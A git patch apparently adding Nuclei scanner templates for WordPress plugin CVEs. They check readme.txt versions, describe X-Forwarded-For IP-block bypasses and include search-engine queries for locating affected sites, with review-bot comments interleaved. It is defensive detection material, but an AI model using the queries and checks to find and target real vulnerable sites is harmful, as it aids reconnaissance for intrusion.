From c22ff795339d7badd150cb9de47feb43e0a8b2d6 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Sat, 31 Aug 2024 12:36:24 +0000 Subject: [PATCH] 20240831 --- date.txt | 2 +- poc.txt | 36 ++++++++ ...4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml | 59 +++++++++++++ ...4536-cbca2c22fe44b388466f971246767370.yaml | 59 +++++++++++++ ...4539-7a30287ecd3463157871780d6cb74779.yaml | 59 +++++++++++++ poc/cve/CVE-2024-2694.yaml | 59 +++++++++++++ ...3886-5b264146b1ead99350dd9d50b9b165a5.yaml | 59 +++++++++++++ poc/cve/CVE-2024-3998.yaml | 59 +++++++++++++ ...3212-b599c8548f771f0451cdc13214f7ff68.yaml | 59 +++++++++++++ ...3254-ab3e4aac5098aa3c00587af765319448.yaml | 59 +++++++++++++ poc/cve/CVE-2024-4401.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5024.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5061.yaml | 59 +++++++++++++ ...5212-26e8ea237e5eb184a7a3f6926818b07b.yaml | 59 +++++++++++++ ...5726-014e0e9e4a215d0587195d5062af61a5.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5784.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5879.yaml | 59 +++++++++++++ poc/cve/CVE-2024-7122.yaml | 59 +++++++++++++ ...7435-56bbd99bfe68d581fd709483401a1c1a.yaml | 59 +++++++++++++ ...7717-8b2d72f894c49fa210faf06966bb467e.yaml | 59 +++++++++++++ poc/cve/CVE-2024-7858.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8016.yaml | 59 +++++++++++++ ...8108-388981d89511f13ba76287252ce2c890.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8252.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8274.yaml | 59 +++++++++++++ ...8276-abcb50055a0fdc77a95290d651b9dbcc.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8319.yaml | 59 +++++++++++++ poc/cve/cve-2001-1473.yaml | 8 +- poc/cve/cve-2008-5587.yaml | 19 +++-- poc/cve/cve-2016-6210.yaml | 8 +- poc/cve/cve-2017-14524.yaml | 42 +++------- poc/cve/cve-2021-44451.yaml | 8 ++ poc/header/header-injection.yaml | 2 +- poc/http/cl-te-http-smuggling.yaml | 72 ++++++++-------- .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 42 ++++------ poc/other/Nsfocus_sas_getFile_read.yaml | 31 ++----- ...tire-018e03e3d84deb0b9ea4b368a9e735bb.yaml | 59 +++++++++++++ 
poc/other/events-calendar-pro.yaml | 59 +++++++++++++ poc/other/jenk.yaml | 2 +- ...mage-1c9c43ea93da339cf4ddfe98cd5e553a.yaml | 59 +++++++++++++ ...oser-3b0822f9c769d60e753b8fc716feb8bc.yaml | 59 +++++++++++++ ...oser-a84bf528fd8a808bc88b049d18e64cda.yaml | 59 +++++++++++++ .../Hikvision_applyCT_RCE.yaml | 45 +++++++--- ...8276-abcb50055a0fdc77a95290d651b9dbcc.yaml | 59 +++++++++++++ .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 42 ++++------ .../Nsfocus_NF_Firewall_FileUpload.yaml | 84 ++++++++----------- ...wall-aecd7866e19c9efd3d56871b357c8881.yaml | 59 +++++++++++++ ...wall-5048b84b845dea0b88ed33d7dc34347e.yaml | 59 +++++++++++++ ...rber-4a64f9ad31b78ab78c48428c5a85590b.yaml | 59 +++++++++++++ ...ager-29722e1d187e63b6b325ae129c9c70d3.yaml | 59 +++++++++++++ ...olio-dcf59e219d34d9e2d14f575ceb25f541.yaml | 59 +++++++++++++ 51 files changed, 2350 insertions(+), 217 deletions(-) create mode 100644 poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml create mode 100644 poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml create mode 100644 poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml create mode 100644 poc/cve/CVE-2024-2694.yaml create mode 100644 poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml create mode 100644 poc/cve/CVE-2024-3998.yaml create mode 100644 poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml create mode 100644 poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml create mode 100644 poc/cve/CVE-2024-4401.yaml create mode 100644 poc/cve/CVE-2024-5024.yaml create mode 100644 poc/cve/CVE-2024-5061.yaml create mode 100644 poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml create mode 100644 poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml create mode 100644 poc/cve/CVE-2024-5784.yaml create mode 100644 poc/cve/CVE-2024-5879.yaml create mode 100644 poc/cve/CVE-2024-7122.yaml create mode 100644 poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml create mode 100644 
poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml create mode 100644 poc/cve/CVE-2024-7858.yaml create mode 100644 poc/cve/CVE-2024-8016.yaml create mode 100644 poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml create mode 100644 poc/cve/CVE-2024-8252.yaml create mode 100644 poc/cve/CVE-2024-8274.yaml create mode 100644 poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml create mode 100644 poc/cve/CVE-2024-8319.yaml create mode 100644 poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml create mode 100644 poc/other/events-calendar-pro.yaml create mode 100644 poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml create mode 100644 poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml create mode 100644 poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml create mode 100644 poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml create mode 100644 poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml create mode 100644 poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml create mode 100644 poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml create mode 100644 poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml create mode 100644 poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml diff --git a/date.txt b/date.txt index 8021f79746..7036fab477 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240830 +20240831 diff --git a/poc.txt b/poc.txt index fc270f2c73..686feab606 100644 --- a/poc.txt +++ b/poc.txt @@ -21642,6 +21642,7 @@ ./poc/cve/CVE-2022-40975.yaml ./poc/cve/CVE-2022-4099-efabe65e0636127b900f654341e2d21b.yaml ./poc/cve/CVE-2022-4099.yaml +./poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml ./poc/cve/CVE-2022-4101-ff9c428babf09501938ec8b47a7ff0b5.yaml ./poc/cve/CVE-2022-4101.yaml ./poc/cve/CVE-2022-4102-211a125e03141593ca6a2a03eab40ec0.yaml 
@@ -22363,6 +22364,7 @@ ./poc/cve/CVE-2022-45358.yaml ./poc/cve/CVE-2022-45359-b36586431dff2aad1fae7b081e9eb505.yaml ./poc/cve/CVE-2022-45359.yaml +./poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml ./poc/cve/CVE-2022-45360-207ef17540c22dd0793408d606b91bda.yaml ./poc/cve/CVE-2022-45360.yaml ./poc/cve/CVE-2022-45361-aa79324e8a1a2b2db7d009a7aa76d972.yaml @@ -22401,6 +22403,7 @@ ./poc/cve/CVE-2022-45376.yaml ./poc/cve/CVE-2022-45377-f99be6f5db095fa34ac8836d9c3bf756.yaml ./poc/cve/CVE-2022-45377.yaml +./poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml ./poc/cve/CVE-2022-4542-f62d4c5bcf581eb4208970f7bf92c622.yaml ./poc/cve/CVE-2022-4542.yaml ./poc/cve/CVE-2022-4544-4a43b5c1e9b5ac07f83a1ad6288e2487.yaml @@ -35007,6 +35010,7 @@ ./poc/cve/CVE-2024-2693-647bc0d6e21e08c5754ccb6bcd1aae5c.yaml ./poc/cve/CVE-2024-2693.yaml ./poc/cve/CVE-2024-2694-b120e064dbe03fdfe7dc85edf005b468.yaml +./poc/cve/CVE-2024-2694.yaml ./poc/cve/CVE-2024-2695-ae730861a36dba83eb67def8728d825a.yaml ./poc/cve/CVE-2024-2695-dcc8ab86728871c2ab1f322b32d5d24a.yaml ./poc/cve/CVE-2024-2695.yaml @@ -39496,6 +39500,7 @@ ./poc/cve/CVE-2024-3883.yaml ./poc/cve/CVE-2024-3885-9e0a7124350833ada45c8c2089abea17.yaml ./poc/cve/CVE-2024-3885.yaml +./poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml ./poc/cve/CVE-2024-3887-c69a35937d64f9aabf71399960d846ed.yaml ./poc/cve/CVE-2024-3887.yaml ./poc/cve/CVE-2024-3888-73a7dff9e7fc032d9c7b3504d9e32105.yaml @@ -39742,6 +39747,7 @@ ./poc/cve/CVE-2024-3997-ec2b985dc77b9e8be9179278d94ac597.yaml ./poc/cve/CVE-2024-3997.yaml ./poc/cve/CVE-2024-3998-3e30ffebe59d9a76218cb85864c1c93f.yaml +./poc/cve/CVE-2024-3998.yaml ./poc/cve/CVE-2024-3999-c476d9afb5ffc3ca8d446456d56d241f.yaml ./poc/cve/CVE-2024-3999.yaml ./poc/cve/CVE-2024-4000-413f9aad8039820df563829dd8dd16d6.yaml 
@@ -40063,6 +40069,7 @@ ./poc/cve/CVE-2024-43210.yaml ./poc/cve/CVE-2024-43211-52583efb98a1ee87166361a87199594d.yaml ./poc/cve/CVE-2024-43211.yaml +./poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml ./poc/cve/CVE-2024-43212-fa7c63c9c1acaf40e2a0fa149e79e1fd.yaml ./poc/cve/CVE-2024-43212.yaml ./poc/cve/CVE-2024-43213-035ab3596c728eee900f004610ee954d.yaml @@ -40146,6 +40153,7 @@ ./poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml ./poc/cve/CVE-2024-43253.yaml ./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml +./poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml ./poc/cve/CVE-2024-43254.yaml ./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml ./poc/cve/CVE-2024-43255.yaml @@ -40458,6 +40466,7 @@ ./poc/cve/CVE-2024-4400-edb034274ef6f17041114a62daa8b47d.yaml ./poc/cve/CVE-2024-4400.yaml ./poc/cve/CVE-2024-4401-d790d6521995cbca6bedf9a614f719bf.yaml +./poc/cve/CVE-2024-4401.yaml ./poc/cve/CVE-2024-4404-3225832ef59af3d93e669e4f0630d732.yaml ./poc/cve/CVE-2024-4404.yaml ./poc/cve/CVE-2024-4409-bd7b37af206b0db99929fc562e902a9e.yaml @@ -40893,6 +40902,7 @@ ./poc/cve/CVE-2024-5021-1b48a97f4f87b8e1c0d35951dcf47c52.yaml ./poc/cve/CVE-2024-5021.yaml ./poc/cve/CVE-2024-5024-df0641cd7d9eed4752dc979388d29728.yaml +./poc/cve/CVE-2024-5024.yaml ./poc/cve/CVE-2024-5025-f6e5bc7c36789d49a83912b9c62d03f6.yaml ./poc/cve/CVE-2024-5025.yaml ./poc/cve/CVE-2024-5028-2b1c7753e02398d12917feca766a8f54.yaml @@ -40922,6 +40932,7 @@ ./poc/cve/CVE-2024-5060-0e9bb89e270fce112d686bcb31ddac36.yaml ./poc/cve/CVE-2024-5060.yaml ./poc/cve/CVE-2024-5061-e85fb07ba4a08a3b3d95773fe18c51f6.yaml +./poc/cve/CVE-2024-5061.yaml ./poc/cve/CVE-2024-5071-783fe5cda41afb7fa1d0cebcc413aaf2.yaml ./poc/cve/CVE-2024-5071-b9e7eecb062d13ae3a35094e64731713.yaml ./poc/cve/CVE-2024-5071.yaml 
@@ -41010,6 +41021,7 @@ ./poc/cve/CVE-2024-5205.yaml ./poc/cve/CVE-2024-5207-dfe92838983c441ca6954031b5866f4e.yaml ./poc/cve/CVE-2024-5207.yaml +./poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml ./poc/cve/CVE-2024-5215-0170d5acc9b537b31bb3fad32634325d.yaml ./poc/cve/CVE-2024-5215.yaml ./poc/cve/CVE-2024-5217.yaml @@ -41336,6 +41348,7 @@ ./poc/cve/CVE-2024-5715.yaml ./poc/cve/CVE-2024-5724-4ec214434fd2f861667853a0711db2bf.yaml ./poc/cve/CVE-2024-5724.yaml +./poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml ./poc/cve/CVE-2024-5726-356112c2928a1e694b7bf670e7c30b58.yaml ./poc/cve/CVE-2024-5726.yaml ./poc/cve/CVE-2024-5727-08c9ece2ef96c189022a2e500fdce8e4.yaml @@ -41365,6 +41378,7 @@ ./poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/cve/CVE-2024-5770.yaml ./poc/cve/CVE-2024-5784-0014276fabbee1d09ebf48d3bcb8d1fe.yaml +./poc/cve/CVE-2024-5784.yaml ./poc/cve/CVE-2024-5787-ba698dc9e13c3c5e0d40143b11aa6de4.yaml ./poc/cve/CVE-2024-5787.yaml ./poc/cve/CVE-2024-5788-28fe2f5078d75f5024e6c25cc111ffd2.yaml @@ -41424,6 +41438,7 @@ ./poc/cve/CVE-2024-5871-bdd808d6a9eceafe261c336341d9e130.yaml ./poc/cve/CVE-2024-5871.yaml ./poc/cve/CVE-2024-5879-15e47d64ae81bc253ae61d7b9ab17d63.yaml +./poc/cve/CVE-2024-5879.yaml ./poc/cve/CVE-2024-5880-da35cf349d9e9d256e9d4d267817f858.yaml ./poc/cve/CVE-2024-5880.yaml ./poc/cve/CVE-2024-5881-deb2b9d2631d7547b1cfede5484472ab.yaml @@ -42076,6 +42091,7 @@ ./poc/cve/CVE-2024-7100-ad8e27985a77f89f3ffd15a9cd3c761c.yaml ./poc/cve/CVE-2024-7100.yaml ./poc/cve/CVE-2024-7122-332eadd538ee19c7f5056f343ea0b155.yaml +./poc/cve/CVE-2024-7122.yaml ./poc/cve/CVE-2024-7134-68ccbd22e014b574fd8573f2d56f4553.yaml ./poc/cve/CVE-2024-7134.yaml ./poc/cve/CVE-2024-7135-4efde48e672954d3ec911965413e7bde.yaml 
@@ -42149,6 +42165,7 @@ ./poc/cve/CVE-2024-7420.yaml ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml ./poc/cve/CVE-2024-7422.yaml +./poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml ./poc/cve/CVE-2024-7447.yaml ./poc/cve/CVE-2024-7484-5be14b55ae30eebe36f1e5fcad1d160a.yaml @@ -42224,6 +42241,7 @@ ./poc/cve/CVE-2024-7702.yaml ./poc/cve/CVE-2024-7703-7d232ae776193850ef9d74eec7d98698.yaml ./poc/cve/CVE-2024-7703.yaml +./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml ./poc/cve/CVE-2024-7775.yaml ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml @@ -42261,6 +42279,7 @@ ./poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml ./poc/cve/CVE-2024-7857.yaml ./poc/cve/CVE-2024-7858-ee11b1c569d7435d78bdfcf72833bbc0.yaml +./poc/cve/CVE-2024-7858.yaml ./poc/cve/CVE-2024-7860-7bfa7ad373e4b2369c7238a1709273fe.yaml ./poc/cve/CVE-2024-7860.yaml ./poc/cve/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml @@ -42274,6 +42293,7 @@ ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml ./poc/cve/CVE-2024-7918.yaml ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml +./poc/cve/CVE-2024-8016.yaml ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml ./poc/cve/CVE-2024-8030.yaml ./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml @@ -42294,6 +42314,7 @@ ./poc/cve/CVE-2024-8056.yaml ./poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml ./poc/cve/CVE-2024-8091.yaml +./poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml ./poc/cve/CVE-2024-8120.yaml ./poc/cve/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml 
@@ -42305,8 +42326,12 @@ ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml ./poc/cve/CVE-2024-8200.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml +./poc/cve/CVE-2024-8252.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml +./poc/cve/CVE-2024-8274.yaml +./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/cve/CVE-2024-8319-f52695adcae621062e419e0168d0ec9c.yaml +./poc/cve/CVE-2024-8319.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -64184,6 +64209,7 @@ ./poc/other/attendance-manager-e0ca84a106bbce24a15a50a52260c615.yaml ./poc/other/attendance-manager.yaml ./poc/other/attesa-extra.yaml +./poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml ./poc/other/attire-blocks-4d0bda665c71d62ec3979730095585b3.yaml ./poc/other/attire-blocks.yaml ./poc/other/attorney-75ae42f95c5029a5c34276ce81634c4d.yaml @@ -72049,6 +72075,7 @@ ./poc/other/events-addon-for-elementor-plugin.yaml ./poc/other/events-addon-for-elementor.yaml ./poc/other/events-calendar-pro-906106af4e69d60e26f99cff1906aa71.yaml +./poc/other/events-calendar-pro.yaml ./poc/other/events-calendar-registration-booking-by-events-plus-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/events-calendar-registration-booking-by-events-plus.yaml ./poc/other/events-made-easy-00e7f5be1ab35984fe7530e3d9ef1afb.yaml @@ -86108,6 +86135,7 @@ ./poc/other/share-one-drive-8aefbdc94d261c5ffcf5b6d1472c5159.yaml ./poc/other/share-one-drive.yaml ./poc/other/share-this-c141fa5002265cf4cb976ed6cf31fc6c.yaml +./poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml ./poc/other/share-this-image-576f17348faf1cebc874fccfe14a8b45.yaml ./poc/other/share-this-image-af2bcc66229bf5bd6c08d48a24366221.yaml ./poc/other/share-this-image.yaml 
@@ -88807,9 +88835,11 @@ ./poc/other/td-cloud-library-1c4748f99f4bb0e2e425c3b000b9c0fc.yaml ./poc/other/td-cloud-library.yaml ./poc/other/td-composer-1cda7428f15f4698d6291b17e9baa214.yaml +./poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml ./poc/other/td-composer-4f5ed17eac889295b2deedaa4975fd95.yaml ./poc/other/td-composer-80143192a811ca26978bf2e6218c23f6.yaml ./poc/other/td-composer-9494a3ec135164d73110d9ffc217777e.yaml +./poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml ./poc/other/td-composer-ce48f32c9e769abd4cb0ab1ac1ace80c.yaml ./poc/other/td-composer-d39cb83229da357ab1af912bf2630331.yaml ./poc/other/td-composer-f3f203d9ab101f9d04ccf12ec6b5d164.yaml @@ -102170,6 +102200,7 @@ ./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml ./poc/sql/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml +./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/sql/Changdao-165-SQLi.yaml ./poc/sql/Cmseasy-Http-Head-sqli.yaml ./poc/sql/Cmseasy-celive-sqli.yaml @@ -110381,6 +110412,7 @@ ./poc/web/wapppress-builds-android-app-for-website-93eb7c704e6e0ef25aa6b8829b01d3fd.yaml ./poc/web/wapppress-builds-android-app-for-website.yaml ./poc/web/web-application-firewall-844b9d1d24421cab341a4ecc56416b51.yaml +./poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml ./poc/web/web-application-firewall.yaml ./poc/web/web-cache-poising.yaml ./poc/web/web-cache-poisoning.yaml @@ -111688,6 +111720,7 @@ ./poc/wordpress/instawp-connect-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/instawp-connect-plugin.yaml ./poc/wordpress/instawp-connect.yaml +./poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml ./poc/wordpress/ip-vault-wp-firewall-595200d561a42d70e218defec57a75a8.yaml ./poc/wordpress/ip-vault-wp-firewall.yaml ./poc/wordpress/itempropwp-3416bfa27ed25f7ffea8196830edb064.yaml 
@@ -113913,6 +113946,7 @@ ./poc/wordpress/wp-central.yaml ./poc/wordpress/wp-cerber-147fd304b3df157c7f7d15a91cde2e37.yaml ./poc/wordpress/wp-cerber-2de93f4e30326bd812b1fce3dd004555.yaml +./poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml ./poc/wordpress/wp-cerber-87f6796ba287e18749650930f19b92f6.yaml ./poc/wordpress/wp-cerber-925189d34deb9cf3a7da967fb678739e.yaml ./poc/wordpress/wp-cerber-a6210c801ebe77c8a4b0906ac51e8e6f.yaml @@ -114639,6 +114673,7 @@ ./poc/wordpress/wp-events-7838675c7859ff8a7694725464a2c880.yaml ./poc/wordpress/wp-events-939c8e41990e721256330f6828258871.yaml ./poc/wordpress/wp-events-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml ./poc/wordpress/wp-events-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-events-plugin.yaml ./poc/wordpress/wp-events.yaml @@ -118604,6 +118639,7 @@ ./poc/wordpress/wpzoom-inspiro-pro-9bf7823e174d198324751124dceb7c43.yaml ./poc/wordpress/wpzoom-inspiro-pro.yaml ./poc/wordpress/wpzoom-portfolio-34081bbf6d948f7de8763d03d9ef73e2.yaml +./poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml ./poc/wordpress/wpzoom-portfolio.yaml ./poc/wordpress/wpzoom-shortcodes-9bd9f0c961d140a7a58265e49125c3ca.yaml ./poc/wordpress/wpzoom-shortcodes.yaml diff --git a/poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml b/poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml new file mode 100644 index 0000000000..04b14575a6 --- /dev/null +++ b/poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd
+
+info:
+ name: >
+ WP Cerber Security <= 9.4 - IP Protection Bypass
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Cerber Security plugin for WordPress is vulnerable to IP Protection bypass in versions up to, and including 9.4 due to the plugin improperly checking for a visitor's IP address. This makes it possible for an attacker whose IP address has been blocked to bypass this control by setting the X-Forwarded-For: HTTP header to an IP Address that hasn't been blocked.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2022-4100
+ metadata:
+ fofa-query: "wp-content/plugins/wp-cerber/"
+ google-query: inurl:"/wp-content/plugins/wp-cerber/"
+ shodan-query: 'vuln:CVE-2022-4100'
+ tags: cve,wordpress,wp-plugin,wp-cerber,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-cerber/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-cerber"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml b/poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml
new file mode 100644
index 0000000000..92c8b3b6a5
--- /dev/null
+++ b/poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml
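Review bot: The template is a version fingerprint, not a vulnerability check: its only signal is the `Stable tag:` line of readme.txt compared against `<= 9.4`, so a finding means "this version string is published", not that the X-Forwarded-For handling is actually reachable on this host, and a readme with `Stable tag: trunk` (which `([0-9.]+)` does not match) or one that was not bumped with the release silently yields no finding. The `description` should state this so a reader of the scan output does not treat it as confirmed, e.g. append `Detection is version-based (readme.txt Stable tag) and does not exercise the bypass; confirm the installed version and any proxy-side client-IP handling before acting.` The same readme-only pattern is used by the other new plugin templates in this commit (CVE-2022-4536, CVE-2022-4539, CVE-2024-3886, CVE-2024-43212, CVE-2024-43254, CVE-2024-4401) and, against the `Version:` header of style.css, by the two Betheme templates (CVE-2024-2694, CVE-2024-3998).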
@@ -0,0 +1,59 @@
+id: CVE-2022-4536-cbca2c22fe44b388466f971246767370
+
+info:
+ name: >
+ IP Vault – WP Firewall <= 1.1 - IP Address Spoofing to Protection Mechanism Bypass
+ author: topscoder
+ severity: medium
+ description: >
+ The IP Vault – WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/66e89753-f83e-4e60-b165-6d3d101d6c59?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2022-4536
+ metadata:
+ fofa-query: "wp-content/plugins/ip-vault-wp-firewall/"
+ google-query: inurl:"/wp-content/plugins/ip-vault-wp-firewall/"
+ shodan-query: 'vuln:CVE-2022-4536'
+ tags: cve,wordpress,wp-plugin,ip-vault-wp-firewall,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ip-vault-wp-firewall/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ip-vault-wp-firewall"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
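Review bot: The description line reads `supply the X-Forwarded-For header with with a different IP Address`; drop the doubled `with`. The same sentence, with the same typo, is in the CVE-2022-4539 template added later in this commit.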
diff --git a/poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml b/poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml
new file mode 100644
index 0000000000..75864910b2
--- /dev/null
+++ b/poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml
@@ -0,0 +1,59 @@
+id: CVE-2022-4539-7a30287ecd3463157871780d6cb74779
+
+info:
+ name: >
+ Web Application Firewall <= 2.1.2 - IP Address Spoofing to Protection Mechanism Bypass
+ author: topscoder
+ severity: medium
+ description: >
+ The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e99531c-8742-4f91-8525-65bb3cb06644?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
